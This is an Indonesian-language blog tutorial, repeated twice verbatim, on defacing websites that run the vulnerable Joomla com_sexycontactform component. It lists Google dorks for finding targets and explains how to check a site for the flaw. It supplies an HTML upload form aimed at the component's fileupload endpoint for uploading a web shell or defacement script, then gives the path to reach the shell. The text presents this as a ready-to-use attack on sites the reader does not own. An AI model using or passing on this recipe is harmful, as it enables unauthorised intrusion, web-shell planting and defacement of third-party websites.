Bahan-Bahan :
.Dork : inurl:/com_sexycontactform/ site:id <<--- bisa diganti contoh: .com.br, co.uk , .il ,.net dll
inurl:/components/com_sexycontactform/ black
inurl:/components/com_sexycontactform/ intext:copyright 2015
inurl:/components/com_sexycontactform/ index of
inurl:/components/com_sexycontactform/ intittle: " index of "
.eksploit : /components/com_sexycontactform/fileupload/index.php
.shell kamu
Langkah":
1.masukkan dork ke google lalu cari target ..
2.lalu untuk mengecheck itu vuln atau tidak bisa dengan cara memasukkan exploit dibelakang url target
contoh: www.local.com/components/com_sexycontactform/fileupload/index.php lalu enter ..
3.kalo ada tulisan file [] atau semacam nya bla bla itu VULn bisa dideface ..
4.kalo error / not found atau kembali ke halaman awal itu gak Vuln .
5.lalu setelah mendapat yg vuln, siapkan exploit ..
copy code ini CSRF ini :
<form method="POST" action="http://www.target.com/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
PASTE KODE ITU KE NOTEPAD , NAH MASUKKAN TARGET KE DALAM KODE ITU , DISITU ADA BACAAN WWW.TARGET.COM , GANTI DENGAN SITE TARGET ..
LALU SAVE ..
SETELAH DISAVE , BUKA ITU DENGAN CARA KLIK 2 KALI ..
SETELAH KEBUKA MAKA AKAN MUNCUL TEMPAT UPLOAD , MAKA UPLOAD SHELL ABANG ..
KALO BERHASIL NANTI AKAN KELUAR SUCCESS / KELUAR URL LETAK SHELL ABANG ..
KALO FALSE ATAU ERROR BERARTI GAK BISA UPLOAD SHELL , MAKA GANTI SAJA DENGAN UPLOAD
SCRIPT DEFACE KAMU ..
AKSES SHELL:
http://www.target.com/components/com_sexycontactform/fileupload/files/namashell.php <<--- nama shell kamu ..
.Dork : inurl:/com_sexycontactform/ site:id <<--- bisa diganti contoh: .com.br, co.uk , .il ,.net dll
inurl:/components/com_sexycontactform/ black
inurl:/components/com_sexycontactform/ intext:copyright 2015
inurl:/components/com_sexycontactform/ index of
inurl:/components/com_sexycontactform/ intittle: " index of "
.eksploit : /components/com_sexycontactform/fileupload/index.php
.shell kamu
Langkah":
1.masukkan dork ke google lalu cari target ..
2.lalu untuk mengecheck itu vuln atau tidak bisa dengan cara memasukkan exploit dibelakang url target
contoh: www.local.com/components/com_sexycontactform/fileupload/index.php lalu enter ..
3.kalo ada tulisan file [] atau semacam nya bla bla itu VULn bisa dideface ..
4.kalo error / not found atau kembali ke halaman awal itu gak Vuln .
5.lalu setelah mendapat yg vuln, siapkan exploit ..
copy code ini CSRF ini :
<form method="POST" action="http://www.target.com/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
PASTE KODE ITU KE NOTEPAD , NAH MASUKKAN TARGET KE DALAM KODE ITU , DISITU ADA BACAAN WWW.TARGET.COM , GANTI DENGAN SITE TARGET ..
LALU SAVE ..
SETELAH DISAVE , BUKA ITU DENGAN CARA KLIK 2 KALI ..
SETELAH KEBUKA MAKA AKAN MUNCUL TEMPAT UPLOAD , MAKA UPLOAD SHELL ABANG ..
KALO BERHASIL NANTI AKAN KELUAR SUCCESS / KELUAR URL LETAK SHELL ABANG ..
KALO FALSE ATAU ERROR BERARTI GAK BISA UPLOAD SHELL , MAKA GANTI SAJA DENGAN UPLOAD
SCRIPT DEFACE KAMU ..
AKSES SHELL:
http://www.target.com/components/com_sexycontactform/fileupload/files/namashell.php <<--- nama shell kamu ..
Komentar
Posting Komentar